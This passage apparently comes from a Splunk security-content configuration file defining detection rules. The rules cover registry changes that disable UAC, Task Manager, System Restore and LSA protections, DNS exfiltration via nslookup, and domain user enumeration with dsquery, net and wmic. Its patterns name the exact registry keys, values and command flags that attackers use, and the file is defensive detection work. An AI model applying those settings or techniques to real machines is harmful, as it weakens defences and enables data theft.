["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut. action.notable.param.rule_title = Disabling NoRun Windows App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter` [ESCU - Disabling Remote User Account Control - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC). action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications. action.escu.known_false_positives = This registry key may be modified via administrators to implement a change in system policy. This type of change should be a very rare occurrence. action.escu.creation_date = 2020-11-18 action.escu.modification_date = 2020-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Remote User Account Control - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Remcos", "Windows Registry Abuse", "Azorult", "AgentTesla"] action.risk = 1 action.risk.param._risk_message = The Windows registry keys that control the enforcement of Windows User Account Control (UAC) were modified on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Remote User Account Control - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Remcos", "Windows Registry Abuse", "Azorult", "AgentTesla"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC). action.notable.param.rule_title = Disabling Remote User Account Control action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA* Registry.registry_value_data="0x00000000" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_data Registry.action | `drop_dm_object_name(Registry)` | `disabling_remote_user_account_control_filter` [ESCU - Disabling SystemRestore In Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = The following search identifies the modification of registry related in disabling the system restore of a machine. This event or behavior are seen in some RAT malware to make the restore of the infected machine difficult and keep their infection on the box. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following search identifies the modification of registry related in disabling the system restore of a machine. This event or behavior are seen in some RAT malware to make the restore of the infected machine difficult and keep their infection on the box. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = in some cases admin can disable systemrestore on a machine. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling SystemRestore In Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"] action.risk = 1 action.risk.param._risk_message = The Windows registry was modified to disable system restore on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling SystemRestore In Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following search identifies the modification of registry related in disabling the system restore of a machine. This event or behavior are seen in some RAT malware to make the restore of the infected machine difficult and keep their infection on the box. action.notable.param.rule_title = Disabling SystemRestore In Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableConfig" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_systemrestore_in_registry_filter` [ESCU - Disabling Task Manager - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identifies modification of registry to disable the task manager of windows operating system. this event or technique are commonly seen in malware such as RAT, Trojan, TrojanSpy or worm to prevent the user to terminate their process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identifies modification of registry to disable the task manager of windows operating system. this event or technique are commonly seen in malware such as RAT, Trojan, TrojanSpy or worm to prevent the user to terminate their process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Task Manager - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"] action.risk = 1 action.risk.param._risk_message = The Windows Task Manager was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Task Manager - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identifies modification of registry to disable the task manager of windows operating system. this event or technique are commonly seen in malware such as RAT, Trojan, TrojanSpy or worm to prevent the user to terminate their process. action.notable.param.rule_title = Disabling Task Manager action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter` [ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Potential to be triggered by an administrator disabling protections for troubleshooting purposes. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = An attempt to disable Windows LSA defences was detected on $dest$. The reg key $registry_path$ was deleted by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Windows Local Security Authority Defences via Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection looks for the deletion of registry keys which disable LSA protection and MS Defender Device Guard. action.notable.param.rule_title = Disabling Windows Local Security Authority Defences via Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LsaCfgFlags", "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\*", "*\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL") Registry.action IN (deleted, unknown) by Registry.action Registry.registry_path Registry.process_guid Registry.dest Registry.user| `drop_dm_object_name(Registry)` | join type=outer process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by Processes.user Processes.process_name Processes.process Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)`] | table _time action dest user parent_process_name parent_process process_name process process_guid registry_path | `disabling_windows_local_security_authority_defences_via_registry_filter` [ESCU - DLLHost with no Command Line Arguments with Network - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate third party applications may use a moved copy of dllhost, triggering a false positive. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - DLLHost with no Command Line Arguments with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = The process $process_name$ was spawned by $parent_process_name$ without any command-line arguments on $src$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_image", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - DLLHost with no Command Line Arguments with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies DLLHost.exe with no command line arguments with a network connection. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = DLLHost with no Command Line Arguments with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=dllhost.exe Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(dllhost\.exe.{0,4}$)" | rename dest as src | join host process_id [| tstats `security_content_summariesonly` count latest(All_Traffic.dest) as dest latest(All_Traffic.dest_ip) as dest_ip latest(All_Traffic.dest_port) as dest_port FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by host All_Traffic.process_id | `drop_dm_object_name(All_Traffic)`] | `dllhost_with_no_command_line_arguments_with_network_filter` [ESCU - DNS Exfiltration Using Nslookup App - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = admin nslookup usage action.escu.creation_date = 2021-04-15 action.escu.modification_date = 2021-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - DNS Exfiltration Using Nslookup App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ performing activity related to DNS exfiltration. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - DNS Exfiltration Using Nslookup App - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type, TXT, A, AAAA, that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.notable.param.rule_title = DNS Exfiltration Using Nslookup App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "nslookup.exe" Processes.process = "*-querytype=*" OR Processes.process="*-qt=*" OR Processes.process="*-q=*" OR Processes.process="-type=*" OR Processes.process="*-retry=*" by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dns_exfiltration_using_nslookup_app_filter` [ESCU - Domain Account Discovery with Dsquery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover domain users. The `user` argument returns a list of all users registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to discover domain users. The `user` argument returns a list of all users registered in the domain. Red Teams and adversaries alike engage in remote system discovery for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery with Dsquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery with Dsquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="dsquery.exe" AND Processes.process = "*user*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_dsquery_filter` [ESCU - Domain Account Discovery With Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery With Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Graceful Wipe Out Attack", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery With Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `net.exe` or `net1.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike may use net.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Domain Account Discovery With Net App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process = "* user*" AND Processes.process = "*/do*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_net_app_filter` [ESCU - Domain Account Discovery with Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the 